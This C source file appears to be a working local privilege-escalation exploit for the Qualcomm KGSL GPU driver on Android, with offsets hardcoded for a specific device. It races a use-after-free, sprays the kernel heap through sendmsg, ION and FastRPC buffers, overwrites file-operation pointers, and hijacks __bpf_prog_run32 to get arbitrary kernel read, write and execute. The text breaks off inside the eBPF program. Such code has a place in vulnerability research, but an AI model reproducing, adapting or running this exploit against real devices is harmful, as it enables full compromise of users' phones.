#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <sys/syscall.h>
#include <sched.h>
#include <sys/un.h>
#include <pthread.h>
#include "kgsl_exploit.h"
#include <sys/time.h>

//A71:
//dma_buf_fops - __bpf_prog_run32
#define DMA_TO_BPF 0x16f2798
//null_fops - __bpf_prog_run32
#define NULL_TO_BPF 0x16c2700
//__bpf_prog_run32 - __bpf_call_base
#define BPF_TO_BASE 0x18f8

#define SPRAY_1 1
#define PIPE 1

#define DELAY 4000
#define OBJ_SIZE 37
#define NENTS 1
#define NB_REALLOC_THREADS 8
#define SYS_LEN 0x1000
#define SYS_LEN_0 0xf000
//between 320 -480 seems ok
#define REGIONS_LEN_1 (480 * 16)
#define REGIONS_LEN_2 (1024)
#define DMA_ADDRESS 0xfffbf000
#define DMA_PAGES 64
#define VMAS_LEN 50
#define ORDER 26
#define TRIGGER_THRESH 1000
#define BOUNCE_LEN 64
#define SLAB_LEN 5000
#define CPU0 0
#define CPU1 1

#ifdef DMA_SPRAY
  #define MMAP_LEN 64
  #ifdef SPRAY_1
    #define G_REGION_LEN 4
  #else
    #define G_REGION_LEN 3
   #endif
#else
    #define MMAP_LEN 65
  #ifdef SPRAY_1
    #define G_REGION_LEN 2
  #else
    #define G_REGION_LEN 1
  #endif
#endif

static volatile size_t g_nb_realloc_thread_ready = 0;
static volatile size_t g_realloc_now = 0;
static volatile size_t g_trigger_now = 0;
static volatile size_t g_map_now = 0;
static volatile size_t g_import_now = 0;
static volatile size_t g_finished_read = 0;
static volatile size_t g_unlocked_read = 0;
static volatile char* g_ion_regions[G_REGION_LEN] = {0};
static char* bounce_regions[BOUNCE_LEN];
static int bounce_fds[BOUNCE_LEN];
static char* ion_sys_regions[REGIONS_LEN_1 + REGIONS_LEN_2] = {0};
static int ion_sys_fds[REGIONS_LEN_1] = {0};
static int ion_sys_fds2[REGIONS_LEN_2] = {0};
static long trigger_time = 0;
static unsigned long ion_addr = 0;
static unsigned long bpf_addr = 0;

//-------eBPF program, from https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html -------------------------------------------------------

// 25. Copy an eBPF program to run into the ION buffer. A pointer to this program is passed
// to __bpf_prog_run32() as the second argument.
//
// This program will implement a very simple read/write/execute busy loop: it reads from
// the ION buffer to see if there's an operation ('r', 'w', or 'x') to run, reads the
// parameters from the ION buffer, and then executes the operation.
//operation
static int bpf_op_offset = 0x000;
//rw input address
static int bpf_rw_addr_offset = 0x008;
//output address
static int bpf_out_offset = 0x108;
//arguments offsets
static int bpf_arg0 = 0x10;
static int bpf_arg1 = 0x18;
static int bpf_arg2 = 0x20;
static int bpf_arg3 = 0x28;
static int bpf_arg4 = 0x30;

//---------------------------------sendmsg heap spraying, from https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html ---------------------------------

#define CPU_SETSIZE 1024
#define __NCPUBITS  (8 * sizeof (unsigned long))
typedef struct
{
   unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;

#define CPU_SET(cpu, cpusetp) \
  ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
#define CPU_ZERO(cpusetp) \
  memset((cpusetp), 0, sizeof(cpu_set_t))

void reset_globals() {
  g_nb_realloc_thread_ready = 0;
  g_realloc_now = 0;
  g_trigger_now = 0;
  g_map_now = 0;
  g_import_now = 0;
  g_finished_read = 0;
  g_unlocked_read = 0;
  for (int i = 0; i < G_REGION_LEN; i++) {
    g_ion_regions[i] = 0;
  }
}

void migrate_to_cpu(int cpu_num) {
    int syscallres;
    pid_t pid = gettid();
    cpu_set_t cpu;
    CPU_ZERO(&cpu);
    CPU_SET(cpu_num, &cpu);

    syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
    if (syscallres)
    {
        err(1, "Error in the syscall setaffinity");
    }
}

static volatile char g_realloc_data[OBJ_SIZE];

int init_realloc_data(uint64_t dma_address, size_t length) {
  struct cmsghdr *first;
  struct scatterlist* scatter_view; 

  first = (struct cmsghdr*) g_realloc_data;
  first->cmsg_len = sizeof(g_realloc_data);
  first->cmsg_level = 0;

  scatter_view = (struct scatterlist*) g_realloc_data;
  for (int i = 0; i < NENTS; i++) {
    scatter_view[i].length = length;
    scatter_view[i].dma_length = length;
    scatter_view[i].dma_address = dma_address;
  }
  return 0;  
}

struct realloc_thread_arg
{
  pthread_t tid;
  int recv_fd;
  int send_fd;
  struct sockaddr_un addr;
};

int init_unix_sockets(struct realloc_thread_arg * rta) {
  struct timeval tv;
  static int sock_counter = 0;

  if (((rta->recv_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0) ||
      ((rta->send_fd = socket(AF_UNIX, SOCK_DGRAM, 0)) < 0))
  {
    perror("[-] socket");
    goto fail;
  }

  memset(&rta->addr, 0, sizeof(rta->addr));
  rta->addr.sun_family = AF_UNIX;
  sprintf(rta->addr.sun_path + 1, "sock_%x_%d", gettid(), ++sock_counter);
  if (bind(rta->recv_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))
  {
    perror("[-] bind");
    goto fail;
  }

  if (connect(rta->send_fd, (struct sockaddr*)&rta->addr, sizeof(rta->addr)))
  {
    perror("[-] connect");
    goto fail;
  }

  memset(&tv, 0, sizeof(tv));
  if (setsockopt(rta->recv_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) {
    err(1, "setsockopt");
  }

  return 0;
fail:
  printf("[-] failed to initialize UNIX sockets!\n");
  return -1;
}

static void* realloc_thread(void *arg)
{
  struct realloc_thread_arg *rta = (struct realloc_thread_arg*) arg;
  struct msghdr mhdr;
  char buf[200];

  // initialize msghdr
  struct iovec iov = {
    .iov_base = buf,
    .iov_len = sizeof(buf),
  };
  memset(&mhdr, 0, sizeof(mhdr));
  mhdr.msg_iov = &iov;
  mhdr.msg_iovlen = 1;

  // the thread should inherit main thread cpumask, better be sure and redo-it!
  migrate_to_cpu(CPU0);

  // make it block
  while (sendmsg(rta->send_fd, &mhdr, MSG_DONTWAIT) > 0);

  if (errno != EAGAIN)
  { 
    perror("[-] sendmsg");
    goto fail;
  }

  // use the arbitrary data now
  iov.iov_len = 16; // don't need to allocate lots of memory in the receive queue
  mhdr.msg_control = (void*)g_realloc_data; // use the ancillary data buffer
  mhdr.msg_controllen = sizeof(g_realloc_data);

  g_nb_realloc_thread_ready++;

  while (!g_realloc_now) // spinlock until the big GO!
    ;

  // the next call should block while "reallocating"
  if (sendmsg(rta->send_fd, &mhdr, 0) < 0)
  {
    perror("[-] sendmsg");
    goto fail;
  }
  printf("[+] REALLOC THREAD finished\n");
  return NULL;

fail:
  printf("[-] REALLOC THREAD FAILURE!!!\n");
  return NULL;
}

int init_reallocation(struct realloc_thread_arg *rta, size_t nb_reallocs, uint64_t dma_address, size_t length)
{
  int thread = 0;
  int ret = -1;

  if (init_realloc_data(dma_address, length))
  {
    printf("[-] failed to initialize reallocation data!\n");
    goto fail;
  }
  printf("[+] reallocation data initialized!\n");

  printf("[ ] initializing reallocation threads, please wait...\n");
  for (thread = 0; thread < nb_reallocs; ++thread)
  {
    if (init_unix_sockets(&rta[thread]))
    {
      printf("[-] failed to init UNIX sockets!\n");
      goto fail;
    }

    if ((ret = pthread_create(&rta[thread].tid, NULL, realloc_thread, &rta[thread])) != 0)
    {
      perror("[-] pthread_create");
      goto fail;
    }
  }

  while (g_nb_realloc_thread_ready < nb_reallocs)
    sched_yield();

  printf("[+] %lu reallocation threads ready!\n", nb_reallocs);

  return 0;

fail:
  printf("[-] failed to initialize reallocation\n");
  return -1;
}

//------------------------ Specifics to trigger the bug-------------------------------------

struct trigger_uaf_arg {
  int fd;
  unsigned int read;
};

void* trigger_uaf(void* arg) {

  migrate_to_cpu(CPU1);
  struct trigger_uaf_arg* trigger_arg = (struct trigger_uaf_arg*)arg;
  struct dma_buf_sync sync;
  struct timeval start, end;
  long micros_used, secs_used;
  if (trigger_arg->read) {
    sync.flags = DMA_BUF_SYNC_READ;
  } else {
    sync.flags = DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END;
  }
  sync.flags |= DMA_BUF_SYNC_USER_MAPPED;
  while (!g_trigger_now);
  for (int i = 0; i < DELAY; i++);
  gettimeofday(&start, NULL);
  ioctl(trigger_arg->fd, DMA_BUF_IOCTL_SYNC, (unsigned long)(&sync));
  gettimeofday(&end, NULL);
  secs_used=(end.tv_sec - start.tv_sec); //avoid overflow by subtracting first
  trigger_time = ((secs_used*1000000) + end.tv_usec) - (start.tv_usec);
  printf("micros_used: %ld\n",trigger_time);  
  return NULL;
}

void* read_pipe(void* arg) {
  int buffer[80];
  
  migrate_to_cpu(CPU1);
  int fd = *((int*)arg);
  read(fd, buffer, sizeof(buffer));
  g_unlocked_read = 1;
  close(fd);
  while(!g_finished_read);
  return NULL;  
}

void* ion_map(void* arg) {
  migrate_to_cpu(CPU0);
  int fd = *((int*)arg);
#ifdef SPRAY_1
  while (!g_map_now);
#endif
  for (int i = 0; i < G_REGION_LEN; i++) {
    g_ion_regions[i] = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, i * 0x1000);
    if (g_ion_regions[i] == MAP_FAILED) {
      err(1, "ion region map %d failed", i);
    }
  }
  return NULL;
}

void* gpu_import(void* arg) {
  migrate_to_cpu(CPU0);
  struct kgsl_gpuobj_import* par = (struct kgsl_gpuobj_import*)arg;
  int kgsl_fd = par->id;
  par->id = 0;
  while (!g_import_now);
#ifndef SPRAY_1
  for (int i = 0; i < G_REGION_LEN; i++) {
    munmap((void*)(g_ion_regions[i]), 0x1000);
  }
#endif
  if (ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, par) < 0) {
      err(1, "IOCTL_KGSL_GPUOBJ_IMPORT 2 failed.\n");
  }
  return NULL;
}

uint64_t compute_alignment(size_t power) {
  return (uint64_t)((power << 16) & 0xFF0000);
}

//Fill out kgsl memory so the next one will fail
void prepare_gpu_import(int kgsl_fd, uint64_t* regions) {

  for (int i = 0; i < MMAP_LEN - 1; i++) {
    struct kgsl_gpuobj_import par;
    struct kgsl_gpuobj_import_useraddr useraddr = {.virtaddr = regions[i]};
    par.flags = compute_alignment(ORDER);
    par.priv = (uint64_t)(&useraddr);
    par.type = KGSL_USER_MEM_TYPE_ADDR;
    par.priv_len = 0x1000;
    par.id = 0;
    if (ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &par) < 0) {
      err(1, "IOCTL_KGSL_GPUOBJ_IMPORT %d\n", i);
    }
  }
}

//-----------------------------------bounce buffer and buddy heap spraying--------------------

struct bounce_buffer_param {
  int rpc_fd;
  int ion_fd;
  int process_fd;
  int args_fd;
  char* process_region;
  char* args_region;
  char* sys_region;
  int null_fds[SLAB_LEN];
};

void spray_system_heap(int ion_fd, struct bounce_buffer_param* param) {
  //First round spraying, use large chunk up the memory pool.
  for (int i = 0; i < REGIONS_LEN_1; i++) {
	struct ion_allocation_data ion_alloc_data;
	ion_alloc_data.len = SYS_LEN_0;
	ion_alloc_data.flags = 1;
	ion_alloc_data.heap_id_mask = ION_HEAP(25);

    if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
      err(1, "ION_IOC_ALLOC bounce failed\n");
    }
    ion_sys_fds[i] = ion_alloc_data.fd;
  }
  //Second round spraying, use single page so we can map it to bounce buffer.
  for (int i = 0; i < REGIONS_LEN_2; i++) {
	struct ion_allocation_data ion_alloc_data;
	ion_alloc_data.len = SYS_LEN;
	ion_alloc_data.flags = 1;
	ion_alloc_data.heap_id_mask = ION_HEAP(25);

    if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
      err(1, "ION_IOC_ALLOC bounce failed\n");
    }
    ion_sys_fds2[i] = ion_alloc_data.fd;
  }

  //Spray with null files to create new slab 
  for (int i = 0; i < SLAB_LEN; i++) {
    param->null_fds[i] = open("/dev/null", 0);
  }

  
  //set the top and bottom as bounce regions
  if (BOUNCE_LEN < 2) {
    err(1, "bounce len has to be greater than or equal to 2\n");
  }
  //Use region2 to map the rest of the bounce buffer.
  for (int i = 0; i < BOUNCE_LEN; i++) {
    if (i == 1) continue;
    bounce_regions[i] = ion_sys_regions[i] = mmap(NULL, SYS_LEN, PROT_READ | PROT_WRITE, MAP_SHARED, ion_sys_fds2[REGIONS_LEN_2 - 1 - BOUNCE_LEN + i], 0);
    if (bounce_regions[i] == MAP_FAILED) {
      err(1, "bounce regions failed\n");
    }
    bounce_fds[i] = ion_sys_fds2[REGIONS_LEN_2 - 1 - BOUNCE_LEN + i];
  }
  //Last of region 1 should be below the new slab, map it to the first bounce region
  bounce_regions[1] = ion_sys_regions[1] = mmap(NULL, SYS_LEN, PROT_READ | PROT_WRITE, MAP_SHARED, ion_sys_fds2[REGIONS_LEN_2 - 1], 0);
  if (bounce_regions[1] == MAP_FAILED) {
    err(1, "bounce regions failed\n");
  }
  bounce_fds[1] = ion_sys_fds2[REGIONS_LEN_2 - 1];
}

void allocate_bounce_buffer(struct bounce_buffer_param* param) {

  int ion_fd = open("/dev/ion", O_RDONLY);
  if (ion_fd == -1) {
    err(1, "cannot open ion\n");
  }

  spray_system_heap(ion_fd, param);
  int rpc_fd;

  int rpc_id = open("/dev/adsprpc-smd", 0);
  if (rpc_id == -1) {
    err(1, "cannot open rpc\n");
  }
  printf("rpc opened\n");
  uint32_t info_ptr[1];
  info_ptr[0] = 3;

  if(ioctl(rpc_id, FASTRPC_IOCTL_GETINFO, info_ptr) < 0) {
    err(1, "rpc getinfo failed\n");
  }

  for (int i = 0; i < BOUNCE_LEN; i++) {
	struct remote_dma_handle dma = {.fd = bounce_fds[i], .offset = 0};
	union remote_arg args[1];
	args[0].dma = dma;
	  
	struct fastrpc_ioctl_invoke invoke = {0};
	invoke.handle = 0x3;
	invoke.sc = 16;
	invoke.pra = &(args[0]);
	unsigned int attrs = 16;
    struct fastrpc_ioctl_invoke_attrs crc;
    crc.inv = invoke;
    crc.attrs = &attrs;
    crc.fds = &(bounce_fds[i]);
    ioctl(rpc_id, FASTRPC_IOCTL_INVOKE_ATTRS, &crc);
  }
  param->rpc_fd = rpc_fd;
  param->ion_fd = ion_fd;
  return;
}

void sync_bounce_buffer(int read, int index) {
  struct dma_buf_sync sync;
  sync.flags = DMA_BUF_SYNC_RW;
  if (read) {
    sync.flags |= DMA_BUF_SYNC_END;
  }
  if (ioctl(bounce_fds[index], DMA_BUF_IOCTL_SYNC, (unsigned long)(&sync)) < 0) {
    err(1, "error syncing bounce buffer %d\n", index);
  }
}

void sync_bounce_buffers(int read) {
  printf("[+] syncing bounce buffers\n");
  for (int i = 0; i < BOUNCE_LEN; i++) {
    sync_bounce_buffer(read, i);
  }
}

//----------------------------Utils for finding addresses and faking objects------------------------------------

//Fetch the pointer to the wait_list in struct file to calculate own address, then 
//take away offset to calculate controlled ion buffer address.
unsigned long calculate_ion_addr(long offset, int region) {
  long wait_list_offset = offset + 0x38;
  long total_offset = wait_list_offset + (region - 2)* SYS_LEN;
  unsigned long* wait_list_addr = (unsigned long*)(&(ion_sys_regions[region][wait_list_offset]));
  printf("null file addr: %lx\n", *wait_list_addr);
  return *wait_list_addr - total_offset - SYS_LEN;
}

void overwrite_fops(int region, long offset, unsigned long ion_addr) {
  unsigned long* fops_addr = (unsigned long*)(&(ion_sys_regions[region][offset]));
  printf("overwrite fops %lx\n", fops_addr[1]);
  fops_addr[1] = ion_addr;
  return;
}
//overwrite file mode to allow lseek
void overwrite_fmode(int region, long offset) {
  long fmode_offset = offset + 0x28;
  unsigned int* fmode = (unsigned int*)(&(ion_sys_regions[region][fmode_offset]));
  printf("overwrite fops %x\n", fmode[0]);
  //Add fmode lseek
  *fmode |= 0x4;
  return;
}

long search_null_fops(char* data, size_t len, unsigned long* result) {
  size_t left = len;
  char* curr = data;
  unsigned long* curr_long;
  //Observed pattern of a null file struct. These are right after the null_fops
  const char null_pattern[32] = {
    0, 0, 0,   0, 0,    0, 0,   0, 0x1, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0x2, 0, 0x1d, 0, 0x2, 0, 0,   0, 0, 0, 0, 0, 0, 0
  };

  while (left) {
    if (left >= 64) {
      //match
      if (!memcmp(curr + 16, &(null_pattern[0]), 32)) {
        curr_long = (unsigned long*)curr;
        *result = curr_long[1];
        if ((*result >> 48) == 0xffff) {
          return curr - data;
        }
      }
    }
    curr += 16;
    left -= 16;
  }
  return -1;
}

long search_dma_fops(char* data, size_t len, unsigned long* result) {
  size_t left = len;
  char* curr = data;
  unsigned long* curr_long;
  //Observed pattern of a dma file struct. These are right after the dma_fops
  const char dma_pattern[32] = {
    0,   0, 0, 0, 0,   0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0, 0,
    0x2, 0, 0, 0, 0x7, 0, 0, 0, 0,   0, 0, 0, 0, 0, 0, 0
  };

  while (left) {
    if (left >= 64) {
      //match
      if (!memcmp(curr + 16, &(dma_pattern[0]), 32)) {
        curr_long = (unsigned long*)curr;
        *result = curr_long[1];
        if ((*result >> 48) == 0xffff) {
          return curr - data;
        }
      }
    }
    curr += 16;
    left -= 16;
  }
  return -1;
}

int find_null_fops() {
  unsigned long null_fops;
  for (int i = 2; i < BOUNCE_LEN; i++) {
    if (ion_sys_regions[i] != 0) {
      long offset = search_null_fops(&(ion_sys_regions[i][0]), SYS_LEN, &null_fops);
      if (offset != -1) {
        printf("[+] Found null_fops at %d region offset %ld %lx\n", i, offset, null_fops);
        ion_addr = calculate_ion_addr(offset, i);
        bpf_addr = null_fops - NULL_TO_BPF;
        printf("[+] ion region location: %lx\n", ion_addr);
        printf("[+] bpf addr: %lx\n", bpf_addr);
        overwrite_fops(i, offset, ion_addr);
        overwrite_fmode(i, offset);
        return i;
      }
    }
  }
  printf("[-] Failed to find null_fops\n");
  return -1;
}

int find_dma_fops() {
  unsigned long dma_fops;
  for (int i = 2; i < BOUNCE_LEN; i++) {
    if (ion_sys_regions[i] != 0) {
      long offset = search_dma_fops(&(ion_sys_regions[i][0]), SYS_LEN, &dma_fops);
      if (offset != -1) {
        printf("[+] Found dma_buf_fops at %d region offset %ld %lx\n", i, offset, dma_fops);
        ion_addr = calculate_ion_addr(offset, i);
        bpf_addr = dma_fops - DMA_TO_BPF;
        printf("[+] ion region location: %lx\n", ion_addr);
        printf("[+] bpf addr: %lx\n", bpf_addr);
        overwrite_fops(i, offset, ion_addr);
        overwrite_fmode(i, offset);
        return i;
      }
    }
  }
  printf("[-] Failed to find dma_buf_fops\n");
  return -1;
}

void dump_memory(int i) {
  char name[64];
  snprintf(name, sizeof(name), "/data/local/tmp/mem_dump/mem_dump%u.bin", i);

  FILE* fptr = fopen(name, "wb");
  if (fptr == NULL) {
    err(1, "error open dump file\n");
  }

  for (int i = 2; i < 64; i++) {
    if (ion_sys_regions[i] != 0) {
      fwrite(&(ion_sys_regions[i][0]), SYS_LEN, 1, fptr);
    }
  }

  fclose(fptr);
}

//----------------------------------------------exploit part-----------------------------------------

void do_one_rw(uint64_t dma_address, size_t length, uint64_t* regions, char* ion_region, int* ion_alloc_fds, unsigned int read) {
  struct realloc_thread_arg rta[NB_REALLOC_THREADS];
  memset(rta, 0, sizeof(rta));
  if (init_reallocation(rta, NB_REALLOC_THREADS, dma_address, length)) {
    err(1, "[-] failed to initialize reallocation!\n");
  }

  int kgsl_fd;

  kgsl_fd = open("/dev/kgsl-3d0", 0);
  if (kgsl_fd == -1) {
    err(1, "cannot open kgsl\n");
  }
  
  prepare_gpu_import(kgsl_fd, regions);

  struct kgsl_gpuobj_import par;
  struct kgsl_gpuobj_import_useraddr useraddr = {.virtaddr = (uint64_t)ion_region};
  par.flags = 0x1F0000;
  par.type = KGSL_USER_MEM_TYPE_ADDR;
  par.priv_len = 0x1000;
  par.priv = (uint64_t)(&useraddr);
  par.id = 0;
  
  pthread_t trigger_tid;
  struct trigger_uaf_arg arg = {.fd = ion_alloc_fds[0], .read = read};

  if (pthread_create(&trigger_tid, NULL, trigger_uaf, &arg) != 0) {
      err(1, "[-] pthread_create trigger");
  }
  int pipe_write[PIPE];
  for (int i = 0; i < PIPE; i++) {
    int pipe_fd[2];
    pipe(pipe_fd);
  
    pthread_t rw_tid;
    if (pthread_create(&rw_tid, NULL, read_pipe, &(pipe_fd[0])) != 0) {
      err(1, "[-] pthread_create read");
    }
    pipe_write[i] = pipe_fd[1];
    struct sched_param sched_par = {0};

    if (pthread_setschedparam(rw_tid, SCHED_NORMAL, &sched_par) != 0) {
      err(1, "[-] set priority for rw failed\n");
    }
  }

  struct kgsl_gpuobj_import par2;
  par2.flags = 0x1000;
  par2.priv_len = 0x1000;
  par2.id = kgsl_fd;
#ifdef DMA_SPRAY
  struct kgsl_gpuobj_import_dma_buf buf = {.fd = ion_alloc_fds[2]};
  par2.type = KGSL_USER_MEM_TYPE_DMABUF;
  par2.priv = (uint64_t)(&buf);
#else
  struct kgsl_gpuobj_import_useraddr useraddr2 = {.virtaddr = regions[MMAP_LEN - 1]};
  par2.type = KGSL_USER_MEM_TYPE_ADDR;
  par2.priv = (uint64_t)(&useraddr2);
#endif

  struct sched_param sched_par = {0};

  if (pthread_setschedparam(trigger_tid, SCHED_IDLE, &sched_par) != 0) {
    err(1, "[-] set priority for trigger failed\n");
  }


  char write_char;
  write_char = 'a';

  migrate_to_cpu(CPU0);

  pthread_t import_tid;
  if (pthread_create(&import_tid, NULL, gpu_import, &par2) != 0) {
      err(1, "[-] pthread gpu_import");
  }
#ifdef SPRAY_1
  pthread_t ion_map_tid;
  if (pthread_create(&ion_map_tid, NULL, ion_map, &(ion_alloc_fds[1])) != 0) {
      err(1, "[-] pthread_create ion_map");
  }
#endif
  sleep(1);
#ifndef SPRAY_1
  ion_map(&(ion_alloc_fds[1]));
#endif

  ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &par);
#ifdef SPRAY_1
  g_map_now = 1;
  sched_yield();
  sleep(1);
  while (!g_ion_regions[G_REGION_LEN - 1]);
  for (int i = 0; i < G_REGION_LEN; i++) {
    munmap((void*)(g_ion_regions[i]), 0x1000);
  }
#endif
  g_import_now = 1;
  sched_yield();
  sleep(1);

  struct kgsl_gpumem_free_id id = {.id = par2.id};
  
  g_trigger_now = 1;
  for (int i = 0; i < PIPE; i++) {
    write(pipe_write[i], &write_char, 1);
  }
  while (!g_unlocked_read);
  ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_FREE_ID, &id);
  g_realloc_now = 1;
  sched_yield(); // don't run me, run the reallocator threads!
  sleep(5);
  g_finished_read = 1;

  close(kgsl_fd);
  struct msghdr mhdr;
  unsigned int size = 0;
  for (int i = 0; i < NB_REALLOC_THREADS; i++) {
	  while (size == 0) {
		if ((size = recvmsg(rta[i].recv_fd, &mhdr, MSG_DONTWAIT)) < 0) {
		  err(1, "receive");
		}
	  }
      size = 0;
  }
  if (trigger_time < TRIGGER_THRESH) {
    printf("[-] Failed to win the race\n");
  } else {
    printf("[+] Read/Write operation succeeded\n");
  }
  for (int i = 0; i < PIPE; i++) {
    close(pipe_write[i]);
  }
  reset_globals();
}

size_t compute_ion_region_size() {
  return (1 << ORDER) -  0x1000 * (VMAS_LEN + 2);
}

int init_tmp_region(int ion_fd, char** tmp_ion_regions, char** ion_region) {
  int ion_alloc_fd = -1;

  struct ion_allocation_data ion_alloc_data;
  ion_alloc_data.len = 1 << ORDER;
  ion_alloc_data.flags = 1;
  ion_alloc_data.heap_id_mask = ION_HEAP(25);

  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
    err(1, "ION_IOC_ALLOC 1 failed\n");
  }
  
  ion_alloc_fd = ion_alloc_data.fd;
  if (ion_alloc_data.len < 0x1000 * (VMAS_LEN + 2)) {
    err(1, "VMAS_LEN too large\n");
  }

  size_t ion_region_size0 = compute_ion_region_size();

  tmp_ion_regions[0] = mmap(NULL, ion_region_size0, PROT_READ | PROT_WRITE, MAP_SHARED, ion_alloc_data.fd, 0x1000);
  if (tmp_ion_regions[0] == MAP_FAILED) {
    err(1, "map failed tmp region 0");
  }

  *ion_region = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE, ion_alloc_data.fd, 0x2000);
  if (ion_region == MAP_FAILED) {
    err(1, "map failed");
  }

  for (int i = 0; i < VMAS_LEN; i++) {
    tmp_ion_regions[i + 1] = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE, ion_alloc_data.fd, ion_alloc_data.len -  0x1000 * (VMAS_LEN - i));
    if (tmp_ion_regions[i + 1] == MAP_FAILED) {
      err(1, "map tmp failed %d", i);
    }
  }
  return ion_alloc_fd;
}

int main() {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  int ion_alloc_fds[3];

  struct bounce_buffer_param p;
  allocate_bounce_buffer(&p);

  uint64_t regions[MMAP_LEN];
  for (int i = 0; i < MMAP_LEN; i++) {
    regions[i] = (uint64_t)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    if ((void*)(regions[i]) == MAP_FAILED) {
      err(1, "mmap %d failed", i);
    }
  }
  
  char* ion_region;
  char* tmp_ion_regions[VMAS_LEN + 1];

  int ion_fd = open("/dev/ion", O_RDONLY);
  if (ion_fd == -1) {
    err(1, "cannot open ion\n");
  }

  struct ion_allocation_data ion_alloc_data2;
  ion_alloc_data2.len = 0x1000 * G_REGION_LEN;
  ion_alloc_data2.flags = 1;
  ion_alloc_data2.heap_id_mask = ION_HEAP(19);

  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data2) < 0) {
    err(1, "ION_IOC_ALLOC 2 failed\n");
  }

  ion_alloc_fds[1] = ion_alloc_data2.fd;
#ifdef DMA_SPRAY
  struct ion_allocation_data ion_alloc_data3;
  ion_alloc_data3.len = 0x1000 * NENTS;
  ion_alloc_data3.flags = 1;
  ion_alloc_data3.heap_id_mask = ION_HEAP(25);

  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data3) < 0) {
    err(1, "ION_IOC_ALLOC failed bounce 1\n");
  }
  ion_alloc_fds[2] = ion_alloc_data3.fd;
#endif
  size_t ion_region_size0 = compute_ion_region_size();
  for (int i = 0; i < 5; i++) {
    ion_alloc_fds[0] = init_tmp_region(ion_fd, &(tmp_ion_regions[0]), &ion_region);
    do_one_rw(DMA_ADDRESS, SYS_LEN * BOUNCE_LEN, regions, ion_region, &(ion_alloc_fds[0]), 0);
    sleep(1);
    sync_bounce_buffers(0);
    
    printf("done read %d\n", i);
    if (trigger_time > TRIGGER_THRESH) {
#ifdef DEBUG_MEM_DUMP
      dump_memory(i);
#endif     
      int null_region_index = find_null_fops();
      int dma_region_index = find_dma_fops();
      int region_index = -1;
      enum region_type type;
      if (null_region_index != -1 && dma_region_index != -1) {
        if (null_region_index < dma_region_index) {
          region_index = null_region_index;
          type = null;
        } else {
          region_index = dma_region_index;
          type = dma;
        }
        
      } else if (null_region_index != -1) {
          region_index = null_region_index;
          type = null;
      } else if (dma_region_index != -1) {
          region_index = dma_region_index;
          type = dma;
      }

      if (region_index != -1) {
        if (region_index < 2) {
          err(1, "region index calculation error\n");
        }
        unsigned long* fops = (unsigned long*)(&(ion_sys_regions[1][0]));
        for (int i = 0; i < 10; i++) {
          fops[i] = bpf_addr;
        }
        sync_bounce_buffers(1);
        unsigned long bpf_data_address = ion_addr + 2048;
        unsigned long __bpf_call_base = bpf_addr - BPF_TO_BASE;
        unsigned long* bpf_data = (unsigned long*)(&(ion_sys_regions[1][2048]));
        trigger_time = 0;
//-------BPF program, from https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html -------------------------------------------------------
        //bpf program to run
		struct bpf_insn insn[] = {
			// Load base address.
			/*  0 */ BPF_LD_IMM64(BPF_REG_6, bpf_data_address),

			// Load R7 = (in:data + 0); this is the operation to perform.
			/*  2 */ BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, bpf_op_offset),

			// Check if this operation is 'r'.
			/*  3 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'r', +4),
			// Load R1 = *(in:data + 8); this is the read address.
			/*  4 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_rw_addr_offset),
			// Load R1 = *R1.
			/*  5 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_1, 0),
			// Store *(out:data + 8) = R1.
			/*  6 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, bpf_out_offset),
			// Done.
			/*  7 */ BPF_JMP_A(13),

			// Check if this operation is 'w'.
			/*  8 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'w', +4),
			// Load R1 = *(in:data + 8); this is the write address.
			/*  9 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_rw_addr_offset),
			// Load R2 = *(in:data + 10); this is the value to write.
			/* 10 */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, bpf_arg0),
			// Store *R1 = R2.
			/* 11 */ BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),
			// Done.
			/* 12 */ BPF_JMP_A(8),

			// Check if this operation is 'x'.
			/* 13 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'x', +7),
			// Load R1 = *(in:data + 10); this is the first argument.
